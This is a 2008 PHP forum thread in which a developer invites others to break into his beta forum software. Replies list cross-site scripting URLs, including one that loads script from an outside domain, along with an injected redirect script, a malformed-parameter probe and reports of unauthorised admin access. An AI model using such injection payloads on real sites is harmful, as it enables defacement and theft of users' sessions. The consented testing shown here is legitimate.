Cobalt.Board Posted June 9, 2008 Share Posted June 9, 2008 I would like people to test drive a new forum system I am working on. Please feel free to try to break in, change anything, whatever you like. This is a completly open test. You can test it at http://scott.projecth4x0r.com/beta and the admin login is at http://scott.projecth4x0r.com/beta/admin.php if anyone wants to try to get in. We are still working on it and it isn't done yet. ALSO: We are aware that the search page isnt working. Link to comment https://forums.phpfreaks.com/topic/109483-new-forum-system/ Share on other sites More sharing options...
Coreye Posted June 10, 2008 Share Posted June 10, 2008 Cross Site Scripting (XSS): http://scott.projecth4x0r.com/beta/forum.php?name="><marquee><h1>Corey Cross Site Scripting (XSS): http://scott.projecth4x0r.com/beta/member.php?username="><marquee><h1>Corey Cross Site Scripting (XSS): You can submit ">code when editing your birthday in your profile. Cross Site Scripting (XSS): You can submit ">code when editing your website in your profile. Cross Site Scripting (XSS): You can submit ">code when editing your location in your profile. Cross Site Scripting (XSS): You can submit ">code when editing the board name from the admin panel. You can post on boards that don't exist. Link to comment https://forums.phpfreaks.com/topic/109483-new-forum-system/#findComment-561647 Share on other sites More sharing options...
Cobalt.Board Posted June 10, 2008 Author Share Posted June 10, 2008 Hey, could you please provide the fix for that? Link to comment https://forums.phpfreaks.com/topic/109483-new-forum-system/#findComment-561662 Share on other sites More sharing options...
imdead Posted June 10, 2008 Share Posted June 10, 2008 htmlspecialchars($username); ? Link to comment https://forums.phpfreaks.com/topic/109483-new-forum-system/#findComment-562169 Share on other sites More sharing options...
keeB Posted June 10, 2008 Share Posted June 10, 2008 UI..................................... better than the last one i just saw but not much. Everything is way too compact. Don't be afraid of space. Use it. Use another color aside from gray between the categories as well. Link to comment https://forums.phpfreaks.com/topic/109483-new-forum-system/#findComment-562352 Share on other sites More sharing options...
keeB Posted June 10, 2008 Share Posted June 10, 2008 In the user list, you properly caught the marquee.. but if I click on the user... http://scott.projecth4x0r.com/beta/member.php?username=\%22%3E%3Cmarquee%3ECore Link to comment https://forums.phpfreaks.com/topic/109483-new-forum-system/#findComment-562353 Share on other sites More sharing options...
helraizer Posted June 11, 2008 Share Posted June 11, 2008 On that same note http://scott.projecth4x0r.com/beta/member.php?username=\%22%3E%3Cscript%20src=http://www.helraizer.co.uk/xss1.js%3E%3C/script%3E http://scott.projecth4x0r.com/beta/member.php?username=\\\\\\\\\\\\\\\\\\\\\\\'''''''''''''''''''''''''''''''''''''\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\''''''''''''''''''''''''''''''''''''''''''\\\\\\\\\\\\\\\\\\\\\\\\\\\\''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ Link to comment https://forums.phpfreaks.com/topic/109483-new-forum-system/#findComment-562983 Share on other sites More sharing options...
helraizer Posted June 11, 2008 Share Posted June 11, 2008 http://scott.projecth4x0r.com/beta/message.php/ Link to comment https://forums.phpfreaks.com/topic/109483-new-forum-system/#findComment-562997 Share on other sites More sharing options...
Cobalt.Board Posted June 13, 2008 Author Share Posted June 13, 2008 How can i fix the unsecure admin panel? Link to comment https://forums.phpfreaks.com/topic/109483-new-forum-system/#findComment-564441 Share on other sites More sharing options...
imdead Posted June 14, 2008 Share Posted June 14, 2008 ]http://scott.projecth4x0r.com/beta/member.php?username[] ^ ^ ^ Layout Is Out Of Place + Warning: mysql_real_escape_string() expects parameter 1 to be string, array given in /home/scott/public_html/beta/connect.php on line 10 Link to comment https://forums.phpfreaks.com/topic/109483-new-forum-system/#findComment-565558 Share on other sites More sharing options...
TheFilmGod Posted June 15, 2008 Share Posted June 15, 2008 I get an "owned" message and a page redirect to youtube's "rick rolled." lol Link to comment https://forums.phpfreaks.com/topic/109483-new-forum-system/#findComment-565904 Share on other sites More sharing options...
helraizer Posted June 15, 2008 Share Posted June 15, 2008 Someone changed the title of the page to "<script>alert('owned');location.href='http://www.youtube.com/watch?v=...';</script> ". Need to change that. Link to comment https://forums.phpfreaks.com/topic/109483-new-forum-system/#findComment-565932 Share on other sites More sharing options...
Cobalt.Board Posted June 15, 2008 Author Share Posted June 15, 2008 Hey, I know how to fix the board name HTML, just now how people are getting INTO the admin control panel. Anyone want to tell me? Link to comment https://forums.phpfreaks.com/topic/109483-new-forum-system/#findComment-565937 Share on other sites More sharing options...
Daniel0 Posted June 15, 2008 Share Posted June 15, 2008 Hehe... ooops Link to comment https://forums.phpfreaks.com/topic/109483-new-forum-system/#findComment-565940 Share on other sites More sharing options...
Cobalt.Board Posted June 15, 2008 Author Share Posted June 15, 2008 Care to tell me how people are getting in? Link to comment https://forums.phpfreaks.com/topic/109483-new-forum-system/#findComment-565953 Share on other sites More sharing options...
Daniel0 Posted June 15, 2008 Share Posted June 15, 2008 In this case, people = me. I honestly don't know how, but the account I registered was given access to the admin panel. Edit: If you post the part of the code that determines whether a user should be allowed access to the admin panel or not, then perhaps I'll be able to infer the reason. Link to comment https://forums.phpfreaks.com/topic/109483-new-forum-system/#findComment-565959 Share on other sites More sharing options...
allistera Posted June 15, 2008 Share Posted June 15, 2008 Yup someone hacked it. Link to comment https://forums.phpfreaks.com/topic/109483-new-forum-system/#findComment-566040 Share on other sites More sharing options...
Daniel0 Posted June 15, 2008 Share Posted June 15, 2008 Yup someone hacked it. Good job, Sherlock. I just said it was me... Link to comment https://forums.phpfreaks.com/topic/109483-new-forum-system/#findComment-566071 Share on other sites More sharing options...
Cobalt.Board Posted June 16, 2008 Author Share Posted June 16, 2008 I found the problem with it, I will try to fix it by the end of tomarrow. Link to comment https://forums.phpfreaks.com/topic/109483-new-forum-system/#findComment-566231 Share on other sites More sharing options...
Daniel0 Posted June 16, 2008 Share Posted June 16, 2008 I found the problem with it, I will try to fix it by the end of tomarrow. I see you removed the Javascript I injected, however, the issue is still not fixed. Link to comment https://forums.phpfreaks.com/topic/109483-new-forum-system/#findComment-566717 Share on other sites More sharing options...
allenskd Posted June 17, 2008 Share Posted June 17, 2008 I'm a bit unsettled but here it goes, why is there third party scripts in this? http://scott.projecth4x0r.com/beta/search/ http://scott.projecth4x0r.com/beta/search/readme.txt http://scott.projecth4x0r.com/beta/search/setup.php If you got permissions thats fine but if you plan on marketing your forum you can't use other people codes without permission Link to comment https://forums.phpfreaks.com/topic/109483-new-forum-system/#findComment-567472 Share on other sites More sharing options...
helraizer Posted June 17, 2008 Share Posted June 17, 2008 1 point I've noticed is that your signature strips all HTML, which is fine. However when you use BBCode it converts it HTML, so when you go back to change your signture, what you already have is then stripped out. Also, my signature is 999x999px. So you may want to limit the size of signatures. Link to comment https://forums.phpfreaks.com/topic/109483-new-forum-system/#findComment-567620 Share on other sites More sharing options...
Cobalt.Board Posted June 18, 2008 Author Share Posted June 18, 2008 For the people that are putting js in, we are all out of town and cannot fix it. I could try to fix it on my iPhone but that would take a while Link to comment https://forums.phpfreaks.com/topic/109483-new-forum-system/#findComment-568077 Share on other sites More sharing options...
Cobalt.Board Posted June 19, 2008 Author Share Posted June 19, 2008 Admin panel now removes JS and all HTML. Good luck. I tested it, normal users can now NOT get into admin CP. Link to comment https://forums.phpfreaks.com/topic/109483-new-forum-system/#findComment-568645 Share on other sites More sharing options...
Coreye Posted June 19, 2008 Share Posted June 19, 2008 Admin panel now removes JS and all HTML. Good luck. I tested it, normal users can now NOT get into admin CP. Users can still get into the admin panel and it doesn't remove HTML or JS. Link to comment https://forums.phpfreaks.com/topic/109483-new-forum-system/#findComment-568723 Share on other sites More sharing options...
Recommended Posts